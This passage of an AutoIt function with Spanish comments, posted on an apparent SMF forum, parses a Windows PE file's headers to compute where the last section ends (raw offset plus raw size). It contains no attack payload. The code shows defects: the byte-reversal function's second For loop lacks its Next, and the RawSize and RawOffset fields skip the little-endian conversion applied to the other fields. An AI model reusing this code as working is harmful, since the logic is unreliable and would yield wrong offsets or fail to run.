  36. ;offset Entrada IMAGE_NT_HEADERS firma PE
  37.   $LFvalue=binarymid($binary,$l_fanew+1,4)
  38.   $LFvalue=Dec(OLE(Stringreplace($LFvalue,"0x","",1,0)))
  39.  
  40.  
  41.  
  42.     ;NumberOfSections
  43.    $NofS=$LFvalue+$PEsize+2
  44.    $NofS=BinaryMid($binary,($NofS+1),2)
  45.    $NofS=Dec(OLE(Stringreplace($NofS,"0x","",1,0)))
  46.  
  47.  
  48.    ;Tamaño SizeOfOptionalHeader
  49.    $Size_O_H=$LFvalue+$PEsize+16
  50.    $Size_O_H=BinaryMid($binary,($Size_O_H+1),2)
  51.    $Size_O_H=dec(OLE(StringReplace($Size_O_H,"0x","",1,0)))
  52.  
  53.  
  54. $fin_I_S_H=($LFvalue+$PEsize+$I_F_H+$Size_O_H)+($NofS*$SizeS)
  55.  
  56.  
  57.  
  58. $RawSize=binarymid($binary,$fin_I_S_H-24,4)
  59. $RawSize=dec(StringReplace($RawSize,"0x","",1,0))
  60.  
  61. $RawOffset=binarymid($binary,$fin_I_S_H-20,4)
  62. $RawOffset=dec(StringReplace($RawOffset,"0x","",1,0))
  63.  
  64.  
  65. fileclose($hfile)
  66.  
  67. return $RawSize+$RawOffset
  68.  
  69.  
  70.  
  71.  
  72. EndFunc
  73.  
  74.  
  75. ;Funcion OLE "Orden Little Endian"
  76. Func OLE($Var)
  77. Local $len=stringlen($Var)/2
  78. local $Array[$len+1]
  79. local $Char
  80. local $A=1
  81. local $Result
  82. for $i= 1 to $len
  83.    $Char=stringmid($Var,$A,2)
  84.    $A+=2
  85.    $Array[$i]=$Char
  86.    next
  87. for $x = $len to 1 Step -1
  88.    $Result&=$Array[$x]
  89. Return $Result
  90. EndFunc  


Saludos cualquier dura aquí estoy :)
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines